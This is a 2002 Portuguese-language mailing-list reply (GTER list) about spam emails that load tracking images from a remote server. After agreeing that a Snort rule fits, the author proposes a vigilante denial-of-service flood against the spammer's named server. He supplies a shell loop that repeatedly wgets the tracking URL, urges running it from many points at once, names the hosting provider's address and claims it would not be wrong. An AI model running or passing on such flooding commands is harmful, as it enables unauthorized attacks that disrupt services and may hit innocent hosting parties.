[GTER] olha a malandragem do spamer...

Danton Nunes danton at inexo.com.br
Thu Jun 6 10:28:00 -03 2002


> 
> Oi...
> 
> 	Hmmm... sera' que valeria a pena criar uma regra no Snort para
> estes casos ? O admin da rede seria avisado que estao chegando mensagens
> que, ao serem abertas, podem potencialmente fazer uma chamada externa.
> 
> 	Ou entao sugerir aos fabricantes de anti-virus, que fazem uma
> analise mais detalhada do corpo da mensagem, que passem a alertar os
> usuarios quando estiverem baixando mensagens deste tipo.

está mais para o snort. mas o mais cool mesmo seria disparar um ataque de
negação de serviço via inundação contra o servidor, qualquer coisa como

while sleep 1
do
wget -q -O /dev/null http://www.mailstock.com.br/email/visto.asp\?Email=$RANDOM 
done

isso partindo de vários pontos da internet ao mesmo tempo poderia dar uma
boa lição ao espertinho.

e, a rigor, não estariamos fazendo nada de errado, apenas baixando um
monte de cópias de uma coisa que supostamente deveria ser uma imagem. ;-)

A propósito, esse servidor está hospedado em:
Webair Internet Development Inc (NETBLK-WEBAIRINTERNET)
   40 E Merrick Road Suite 110
   Valley Stream, NY 11580
   US

danton



More information about the gter mailing list